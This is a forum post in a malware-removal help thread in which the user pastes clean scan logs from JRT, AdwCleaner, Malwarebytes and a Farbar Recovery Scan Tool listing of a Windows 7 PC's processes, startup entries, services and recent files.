#3 swaykeb00b
  • Topic Starter
  • Members
  • 10 posts

Posted 26 December 2015 - 10:00 AM

The JRT log:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.1 (11.24.2015)
Operating System: Windows 7 Professional x64 
Ran by Simon (Administrator) on 26.12.2015 at 15:33:18,20
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 0 




Registry: 0 





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 26.12.2015 at 15:35:49,05
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The ADWCLEANER log:

# AdwCleaner v5.026 - Logfile created 26/12/2015 at 15:36:59
# Updated 21/12/2015 by Xplode
# Database : 2015-12-23.1 [Server]
# Operating system : Windows 7 Professional Service Pack 1 (x64)
# Username : Simon - SIMON-PC
# Running from : C:\Users\Simon\Desktop\Malware - Bleeping Computer\AdwCleaner.exe
# Option : Scan
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****


***** [ Files ] *****


***** [ DLL ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****


***** [ Web browsers ] *****


########## EOF - C:\AdwCleaner\AdwCleaner[S5].txt - [610 bytes] ##########

The MBAM log:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 26.12.2015
Scan Time: 15:42
Logfile: 
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2015.12.26.02
Rootkit Database: v2015.12.26.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Simon

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 364181
Time Elapsed: 12 min, 13 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

FRST Log:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:25-12-2015
Ran by Simon (administrator) on SIMON-PC (26-12-2015 15:57:38)
Running from C:\Users\Simon\Downloads
Loaded Profiles: Simon (Available Profiles: Simon)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Norsk, bokmål (Norge)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(MSI) C:\Program Files (x86)\MSI\Fast Boot\FastBootService.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Qualcomm Atheros) C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\macromed\flash\FlashPlayerPlugin_20_0_0_235.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\macromed\flash\FlashPlayerPlugin_20_0_0_235.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2891568 2013-10-22] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13667032 2014-01-20] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2585928 2015-01-16] (NVIDIA Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-12-20] (Intel Corporation)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Fast Boot] => C:\Program Files (x86)\MSI\Fast Boot\StartFastBoot.exe [759120 2015-04-22] ()
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Spotify Web Helper] => C:\Users\Simon\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-25] (Spotify Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7451928 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Spotify] => C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-25] (Spotify Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [177624 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [177624 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs-x32: c:\Windows\SysWOW64\nvinit.dll => c:\Windows\SysWOW64\nvinit.dll [164568 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs-x32:  C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [164568 2015-01-10] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Killer Network Manager.lnk [2015-12-26]
ShortcutTarget: Killer Network Manager.lnk -> C:\Windows\Installer\{4692B750-DE88-4DCF-9163-745AF5604B24}\NetworkManager.exe_130C27D738F34C89BDDF21BCFD74B56D.exe (Flexera Software LLC)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4B93233A-B173-4539-92C3-0DD5545714B4}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://go.microsoft.com/fwlink/p/?LinkId=255141
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Simon\AppData\Roaming\Mozilla\Firefox\Profiles\0n9rh6yz.default-1451081654131
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_235.dll [2015-12-25] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-22] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-25] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-25] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-25] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-05-01] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-22] (Adobe Systems)

Chrome: 
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR DefaultSearchURL: Default -> hxxps://duckduckgo.com/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> duckduckgo.com
CHR DefaultSuggestURL: Default -> hxxps://ac.duckduckgo.com/ac/?q={searchTerms}&type=list
CHR Profile: C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (gEotit4cheapier) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\aplmodepkfbkgbcilffogjhmecfclgmn [2015-01-28]
CHR Extension: (YouTube) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-11]
CHR Extension: (Google Search) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Gmail) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-13]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [101680 2013-10-15] (ELAN Microelectronics Corp.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148744 2015-01-16] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
R2 MSI_FastBoot; C:\Program Files (x86)\MSI\Fast Boot\FastBootService.exe [105296 2015-06-04] (MSI)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2013-10-11] ()
S2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1706312 2015-01-16] (NVIDIA Corporation)
S2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [21833544 2015-01-16] (NVIDIA Corporation)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [344576 2014-04-17] (Qualcomm Atheros) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3671792 2013-10-11] (Intel® Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BfLwf; C:\Windows\System32\DRIVERS\bflwfx64.sys [82096 2014-04-10] (Qualcomm Atheros, Inc.)
S3 busenum; C:\Windows\System32\DRIVERS\SteelBus64.sys [145408 2014-01-08] (SteelSeries Corporation) [File not signed]
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-08-30] (Intel Corporation)
R3 Ke2200; C:\Windows\System32\DRIVERS\e22w7x64.sys [129200 2014-03-27] (Qualcomm Atheros, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\NETwsw02.sys [3599840 2013-10-14] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19784 2015-01-16] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2014-11-22] (NVIDIA Corporation)
R3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [466648 2014-02-21] (Realsil Semiconductor Corporation)
S3 SAlphamHid; C:\Windows\System32\DRIVERS\SAlpham64.sys [38016 2013-05-31] (SteelSeries Corporation) [File not signed]
S3 SAlphaPS2; C:\Windows\System32\DRIVERS\SAlphaPS264.sys [26496 2013-12-12] (SteelSeries Corporation) [File not signed]
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [25088 2015-04-14] (SteelSeries ApS)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-12-26 15:37 - 2015-12-26 15:39 - 00000688 _____ C:\Users\Simon\Desktop\ADW.txt
2015-12-26 15:37 - 2015-12-26 15:37 - 00000000 _____ C:\Users\Simon\Desktop\MBAM.txt
2015-12-26 15:36 - 2015-12-26 15:36 - 00000554 _____ C:\Users\Simon\Desktop\JRT (2).txt
2015-12-26 14:33 - 2015-12-26 11:51 - 01011200 _____ C:\Users\Simon\Desktop\HAKR.exe
2015-12-26 02:14 - 2015-12-26 02:14 - 00002783 _____ C:\Users\Public\Desktop\Killer Network Manager.lnk
2015-12-26 02:14 - 2015-12-26 02:14 - 00000000 ____D C:\ProgramData\Qualcomm
2015-12-26 02:14 - 2015-12-26 02:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Qualcomm Atheros
2015-12-26 02:13 - 2015-12-26 02:13 - 00000000 ____D C:\Program Files\Qualcomm Atheros
2015-12-26 02:10 - 2014-04-17 11:07 - 351626480 _____ (Qualcomm Atheros) C:\Users\Simon\Desktop\KillerSuite_1.1.42.1045_Win7_Win8_Win81-MSI.exe
2015-12-26 02:08 - 2015-12-26 02:08 - 00000000 ____D C:\Program Files (x86)\Creative
2015-12-26 02:06 - 2015-12-26 02:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MSI
2015-12-26 02:06 - 2015-12-26 02:06 - 00000000 ____D C:\Program Files (x86)\MSI
2015-12-26 02:06 - 2015-12-26 02:06 - 00000000 ____D C:\MSI
2015-12-26 02:06 - 2014-04-30 16:23 - 00011248 _____ (Windows (R) Win 7 DDK provider) C:\Windows\acpimof.dll
2015-12-26 02:05 - 2015-11-04 01:50 - 00000000 ____D C:\Users\Simon\Desktop\1.0.1.8
2015-12-26 01:32 - 2015-12-26 14:36 - 00002636 _____ C:\Users\Simon\Desktop\Config.ini
2015-12-26 01:18 - 2015-12-26 01:18 - 00078119 _____ C:\Users\Simon\Desktop\hskr.enigma64
2015-12-26 01:17 - 2015-12-26 01:17 - 00001100 _____ C:\Users\Public\Desktop\The Enigma Protector x64.lnk
2015-12-26 01:17 - 2015-12-26 01:17 - 00000000 ____D C:\Users\Simon\Documents\The Enigma Protector
2015-12-26 01:17 - 2015-12-26 01:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Enigma Protector
2015-12-26 01:17 - 2015-12-26 01:17 - 00000000 ____D C:\Program Files (x86)\The Enigma Protector
2015-12-26 01:11 - 2015-12-26 01:17 - 18186944 _____ (The Enigma Protector Developers Team ) C:\Users\Simon\Downloads\enigma64_en_demo.exe
2015-12-26 00:21 - 2015-12-26 00:21 - 00000219 _____ C:\Users\Simon\Desktop\Counter-Strike Global Offensive.url
2015-12-26 00:21 - 2015-12-26 00:21 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-12-26 00:15 - 2015-12-26 00:15 - 00000967 _____ C:\Users\Public\Desktop\Steam.lnk
2015-12-26 00:15 - 2015-12-26 00:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2015-12-26 00:14 - 2015-12-26 00:14 - 01476720 _____ C:\Users\Simon\Downloads\SteamSetup.exe
2015-12-25 23:58 - 2015-12-26 15:58 - 00016393 _____ C:\Users\Simon\Downloads\FRST.txt
2015-12-25 23:58 - 2015-12-26 15:57 - 00000000 ____D C:\FRST
2015-12-25 23:57 - 2015-12-25 23:57 - 02370560 _____ (Farbar) C:\Users\Simon\Downloads\FRST64.exe
2015-12-25 23:34 - 2015-12-25 23:35 - 00000059 _____ C:\Users\Simon\Desktop\da.txt
2015-12-25 23:21 - 2015-12-25 23:21 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-25 23:21 - 2015-12-25 23:21 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-25 23:14 - 2015-12-25 23:14 - 00000000 ____D C:\Users\Simon\Desktop\Gamle Firefox-data
2015-12-25 23:13 - 2015-12-25 23:13 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-25 23:13 - 2015-12-25 23:13 - 00001151 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-25 23:13 - 2015-12-25 23:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-25 23:13 - 2015-12-25 23:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-12-25 23:12 - 2015-12-25 23:12 - 00248616 _____ C:\Users\Simon\Downloads\Firefox Setup Stub 43.0.2.exe
2015-12-25 22:17 - 2015-12-26 15:35 - 00000554 _____ C:\Users\Simon\Desktop\JRT.txt
2015-12-25 22:06 - 2015-12-25 22:08 - 00000000 ____D C:\Program Files\Adware-Removal-Tool
2015-12-25 22:06 - 2015-12-25 22:06 - 00290304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\subinacl.exe
2015-12-25 22:03 - 2015-12-25 22:03 - 00000000 ___SD C:\ComboFix
2015-12-25 21:52 - 2011-06-26 07:45 - 00256000 _____ C:\Windows\PEV.exe
2015-12-25 21:52 - 2010-11-07 18:20 - 00208896 _____ C:\Windows\MBR.exe
2015-12-25 21:52 - 2009-04-20 05:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00098816 _____ C:\Windows\sed.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00080412 _____ C:\Windows\grep.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00068096 _____ C:\Windows\zip.exe
2015-12-25 21:51 - 2015-12-25 22:03 - 00000000 ____D C:\Qoobox
2015-12-25 21:51 - 2015-12-25 22:01 - 00000000 ____D C:\Windows\erdnt
2015-12-25 21:37 - 2015-12-25 21:38 - 00209654 _____ C:\TDSSKiller.3.1.0.9_25.12.2015_21.37.24_log.txt
2015-12-25 21:22 - 2015-12-26 15:42 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-25 21:21 - 2015-12-25 21:58 - 00000000 ____D C:\Users\Simon\Desktop\Malware - Bleeping Computer
2015-12-25 21:21 - 2015-12-25 21:21 - 00001106 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-12-25 21:21 - 2015-12-25 21:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-12-25 21:21 - 2015-12-25 21:21 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-12-25 21:21 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-12-25 21:21 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-12-25 21:21 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2015-12-25 21:12 - 2015-12-26 15:36 - 00000000 ____D C:\AdwCleaner
2015-12-25 21:02 - 2015-12-25 22:16 - 00000000 ____D C:\Users\Simon\Desktop\TXT
2015-12-25 21:01 - 2015-12-25 21:02 - 00000000 ____D C:\Users\Simon\Desktop\ungdomsskole
2015-12-25 21:00 - 2015-12-25 21:03 - 00000000 ____D C:\Users\Simon\Desktop\Bilder
2015-12-23 02:41 - 2015-12-23 02:41 - 09498816 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 03170304 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 02609152 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00709632 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
